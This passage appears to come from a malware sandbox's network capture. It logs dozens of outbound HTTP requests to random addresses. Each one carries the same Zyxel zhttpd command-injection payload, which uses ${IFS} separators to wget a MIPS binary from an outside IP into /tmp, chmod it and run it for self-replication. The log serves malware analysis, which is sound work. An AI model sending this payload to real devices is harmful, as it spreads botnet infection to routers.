                                                        Feb 2, 2024 06:21:30.348227978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9543192.168.2.144612477.195.185.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348263979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9544192.168.2.145084243.18.174.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348319054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9545192.168.2.143860246.252.120.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348356009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9546192.168.2.144781620.154.197.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348392963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9547192.168.2.1456844151.40.42.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348421097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9548192.168.2.1445890153.132.113.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348445892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9549192.168.2.1443602158.118.4.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348485947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9550192.168.2.1446884177.12.227.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348532915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9551192.168.2.1451866137.24.242.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348567009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9552192.168.2.1455266129.112.53.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348618984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9553192.168.2.1447472173.5.68.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348664045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9554192.168.2.145861262.173.89.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348697901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9555192.168.2.1457128111.37.119.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348727942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9556192.168.2.1455612128.50.179.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348778009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9557192.168.2.1456968140.220.212.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348805904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9558192.168.2.1460234128.44.121.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348846912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9559192.168.2.145003659.238.59.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348908901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9560192.168.2.1440988168.103.65.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348922968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9561192.168.2.1441928116.148.56.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348958969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9562192.168.2.1437576147.35.86.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348993063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9563192.168.2.143809269.16.52.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349050999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9564192.168.2.1433986163.184.11.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349081993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9565192.168.2.145912223.236.86.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349136114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9566192.168.2.143759857.119.119.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349155903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9567192.168.2.143931495.52.137.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349200964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9568192.168.2.1446322171.128.75.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349235058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9569192.168.2.1454058165.186.139.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349296093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9570192.168.2.145135491.169.169.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349320889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9571192.168.2.1448670197.92.20.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349368095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9572192.168.2.1450572211.226.157.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349406958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9573192.168.2.143656280.79.255.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349431038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9574192.168.2.1440978150.145.214.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349469900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9575192.168.2.1459742223.250.92.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349520922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9576192.168.2.1456110153.83.171.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349548101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9577192.168.2.14528981.108.128.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349605083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9578192.168.2.143651251.96.187.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349628925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9579192.168.2.145433624.185.125.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349697113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9580192.168.2.144558088.158.176.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349724054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9581192.168.2.14608509.4.76.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349762917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9582192.168.2.1454454162.102.203.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349797964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9583192.168.2.1448146134.7.234.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349843025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9584192.168.2.145641871.62.171.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349884033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9585192.168.2.1459336146.27.44.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349920988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9586192.168.2.143872617.97.33.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.349952936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9587192.168.2.144732613.105.51.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.352931976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9588192.168.2.1437314188.187.194.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353403091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9589192.168.2.1436666148.103.155.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353425980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9590192.168.2.1453090141.5.42.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353492022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9591192.168.2.1436932150.5.252.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353529930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9592192.168.2.144439279.104.12.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353581905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9593192.168.2.143907659.67.4.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353615046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9594192.168.2.143378258.105.216.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353648901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9595192.168.2.144419872.37.154.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353696108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9596192.168.2.14455401.36.122.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353713036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9597192.168.2.143462220.7.217.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353765965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9598192.168.2.1440492105.18.72.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353786945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9599192.168.2.1460284175.133.21.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353830099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9600192.168.2.145183645.76.105.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.353857994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9601192.168.2.145596262.28.150.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361485004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9602192.168.2.1437006114.142.140.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361521959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9603192.168.2.1458348120.34.123.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361562014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9604192.168.2.14363341.177.211.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361605883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9605192.168.2.144724036.166.55.1443
                                                        TimestampBytes transferredDirectionData
